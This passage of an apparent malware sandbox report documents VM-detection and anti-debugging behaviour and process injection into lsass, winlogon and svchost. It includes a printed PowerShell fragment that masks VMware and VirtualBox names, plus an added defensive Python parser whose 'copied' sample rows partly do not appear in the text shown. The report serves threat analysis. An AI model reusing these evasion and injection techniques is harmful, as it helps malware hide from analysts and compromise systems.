                Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.23.dr | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: storahciNECVMWarVMware SATA CD00
                Source: Amcache.hve.8.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
                Source: Amcache.hve.8.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: wzcsapi.exe, 00000003.00000002.2666839520.000000001B7B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1361992050.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2642522725.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1366665069.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2633046852.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2632826106.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1416668793.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1419893640.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2642135506.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2632168691.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1425374229.000001B94D436000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.dr | Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
                Source: svchost.exe, 0000000F.00000002.2689169832.000002234AEAD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@Hyper-V RAW
                Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.8.dr | Binary or memory string: \driver\vmci,\driver\pci
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.dr | Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
                Source: WerFault.exe, 00000008.00000002.1587829124.00000265B499F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
                Source: Amcache.hve.8.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: WerFault.exe, 00000008.00000003.1585065018.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000003.1582411351.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000002.1587550148.00000265B459F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWQ
                Source: svchost.exe, 0000001E.00000002.2635078292.000002517802B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.dr | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMWare
                Source: svchost.exe, 00000022.00000000.1503370869.00000297A5600000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: Amcache.hve.8.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
                Source: svchost.exe, 0000000A.00000002.2633046852.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: C:\Users\user\Desktop\wzcsvc.exe | API call chain: ExitProcess graph end node | graph_4-8463
                Source: C:\Users\user\Desktop\wzcsvc.exe | Process information queried: ProcessInformation
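                The rows above are a flattened signature table: the report's separate Source, TID and detail cells were run together during extraction, and the "Jump to behavior" link text was kept. Triaging a report this long by eye is error-prone, so the following Python is an added example (not Joe Sandbox tooling) that recovers the cells from raw rows of this shape and summarises, per process or dump, which evasion indicators fired: sleep-loop counts and durations against the report's own thresholds ("> 30", ">= -30000s"), single long delays, hypervisor artefact strings, directory enumeration via FindFirstFileExW, and the DebugPort / CheckRemoteDebuggerPresent checks from the Anti Debugging section. The sample rows are copied from this report; the VM marker list is an assumption drawn from the strings that appear in it.

```python
"""Triage helper for flattened Joe Sandbox 'Sandbox Evasion' rows.

Added example, not Joe Sandbox's own tooling. Handles rows whose cells were
fused ("svchost.exe TID: 7364Thread sleep count: 63 > 30Jump to behavior")
as well as rows already restored with " | " separators.
"""
import re
from collections import defaultdict

# Thresholds exactly as printed in the report rows.
SLEEP_COUNT_THRESHOLD = 30          # "Thread sleep count: 63 > 30"
SLEEP_TIME_THRESHOLD_S = 30000      # "Thread sleep time: -63000s >= -30000s"

# Assumed marker list: hypervisor artefacts that occur in this report's strings.
VM_MARKERS = ("VMware", "VMWare", "VMWARE", "vmci", "Hyper-V", "VBOX", "VBox",
              "VirtualBox", "VEN_15AD", "VEN_80EE")

# Detail cells in this section start with one of these phrases.
DETAIL_KINDS = ("Thread sleep", "Thread delayed", "Last function", "File Volume",
                "Code function", "Binary or memory string", "Process", "API call")

LINE_RE = re.compile(
    r"^\s*Source:\s+(?P<src>.+?)"                      # process path or dump name
    r"(?:\s+TID:\s*(?P<tid>\d+))?"                     # optional thread id
    r"\s*\|?\s*"                                       # tolerate a restored separator
    r"(?P<detail>(?:" + "|".join(map(re.escape, DETAIL_KINDS)) + r").*?)"
    r"(?:Jump to behavior)?\s*$"                       # drop residual link text
)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)\s*>\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*-(\d+)s\s*>=\s*-(\d+)s")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")

# Rows copied verbatim from the report section above (residue included).
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep count: 63 > 30Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep time: -63000s >= -30000sJump to behavior",
    r"Source: C:\Windows\System32\dwm.exe TID: 7452Thread sleep count: 9875 > 30",
    r"Source: C:\Users\user\Desktop\wzcsapi.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: Amcache.hve.8.drBinary or memory string: VMware",
    r"Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819BE250 FindFirstFileExW,5_2_00000216819BE250",
    r"Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_00007FFAAC564A02 CheckRemoteDebuggerPresent,1_2_00007FFAAC564A02",
]


def parse_line(line):
    """Split one row into {'src', 'tid', 'detail'}; None if it is not a signature row."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"src": m["src"], "tid": int(m["tid"]) if m["tid"] else None,
            "detail": m["detail"]}


def source_name(src):
    """Reduce 'C:\\...\\svchost.exe' or 'svchost.exe, <dump>, ...' to 'svchost.exe'."""
    return src.split(",")[0].strip().rsplit("\\", 1)[-1]


def summarise(lines):
    """Aggregate evasion indicators per source, using the thresholds the report prints."""
    out = defaultdict(lambda: {"sleep_count_max": 0, "sleep_time_s_max": 0,
                               "long_delays": 0, "vm_strings": 0,
                               "file_enum": 0, "debug_queries": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s, d = out[source_name(rec["src"])], rec["detail"]
        if m := SLEEP_COUNT_RE.search(d):
            if int(m[1]) > int(m[2]):
                s["sleep_count_max"] = max(s["sleep_count_max"], int(m[1]))
        elif m := SLEEP_TIME_RE.search(d):
            if int(m[1]) >= int(m[2]):
                s["sleep_time_s_max"] = max(s["sleep_time_s_max"], int(m[1]))
        elif m := DELAY_RE.search(d):
            if int(m[1]) >= SLEEP_TIME_THRESHOLD_S:
                s["long_delays"] += 1
        elif d.startswith("Binary or memory string") and any(k in d for k in VM_MARKERS):
            s["vm_strings"] += 1
        elif "FindFirstFileExW" in d:
            s["file_enum"] += 1
        elif "DebugPort" in d or "CheckRemoteDebuggerPresent" in d:
            s["debug_queries"] += 1
    return dict(out)


if __name__ == "__main__":
    for name, indicators in summarise(SAMPLE_LINES).items():
        print(f"{name:20s} {indicators}")
```

                Feed it the whole section (for example `summarise(open("report.txt").read().splitlines())`) and the per-source table makes the injection picture visible at a glance: the sleep loops and FindFirstFileExW enumeration are attributed to svchost.exe, winlogon.exe, lsass.exe and dwm.exe rather than to the dropped binaries, which is consistent with the process-injection signatures listed at the top of the report, while the DebugPort queries stay with r8k29DBraE.exe itself.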

                Anti Debugging

                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_00007FFAAC564A02 CheckRemoteDebuggerPresent,1_2_00007FFAAC564A02
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F597D90
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F59FDA0 GetProcessHeap,1_2_000002616F59FDA0
                Source: C:\Users\user\Desktop\wzcsapi.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\wzcsvc.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F597D90
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5A6218 SetUnhandledExceptionFilter,1_2_000002616F5A6218
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F59D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F59D814
                Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819BD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000216819BD814
                Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000216819B7D90
                Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000001CA7D1E7D90
                Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1ED814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000001CA7D1ED814
                Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1F6218 SetUnhandledExceptionFilter,6_2_000001CA7D1F6218
                Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000265B3C07D90
                Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C0D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000265B3C0D814
                Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C16218 SetUnhandledExceptionFilter,8_2_00000265B3C16218
                Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD5D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD5D814
                Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD66218 SetUnhandledExceptionFilter,9_2_0000017D2DD66218
                Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD57D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD57D90
                Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000022F4B92D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000022F4B92D814
                Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000022F4B927D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000022F4B927D90
                Source: C:\Windows\System32\svchost.exe | Code function: 11_2_0000013DE2727D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000013DE2727D90
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2736218 SetUnhandledExceptionFilter,11_2_0000013DE2736218
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000013DE272D814
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1CAD814
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB6218 SetUnhandledExceptionFilter,14_2_00000262F1CB6218
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1CA7D90
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E157D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002234E157D90
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E166218 SetUnhandledExceptionFilter,15_2_000002234E166218
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002234E15D814
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B17D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000023942B17D90
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000023942B1D814
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001EF056DD814
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E6218 SetUnhandledExceptionFilter,17_2_000001EF056E6218
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001EF056D7D90
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002287AD7D814
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD77D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002287AD77D90
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD86218 SetUnhandledExceptionFilter,18_2_000002287AD86218
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001B94DA9D814
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001B94DA97D90
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202586218 SetUnhandledExceptionFilter,20_2_0000025202586218
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002520257D814
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202577D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000025202577D90
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001A9EBFCD814
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001A9EBFC7D90
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1637D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000019FF1637D90
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000019FF163D814
                Source: C:\Users\user\Desktop\r8k29DBraE.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe | Domain query: i.ibb.co
Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.cs | Reference to suspicious API methods: LoadLibrary("kernel32.dll")
Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.cs | Reference to suspicious API methods: GetProcAddress(intPtr, "IsDebuggerPresent")
Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.cs | Reference to suspicious API methods: OpenProcess(1024u, 0, GetCurrentProcessId())
Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 17D2DD20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22F4B8F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 262F1EA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23942AE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1EF056A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2287AD40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B94DA60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25202540000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A9EBF90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19FF1600000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2A76A170000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 14D26990000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2175D5C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B0AB960000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2129B2A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26384180000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25178730000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1495FCF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22125D90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 297A5D80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2D0F41C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2C325340000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AEFC900000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 270F3530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D326280000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16131E60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AE137C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2C93A3B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E2E4190000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: 1450000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AB68FA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 265951C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2C263510000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2234E120000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18198580000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19E8E330000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B5A2950000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CD340C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B653790000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B19A0E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24730B30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15F35DA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 200792F0000 protect: page execute and read and write
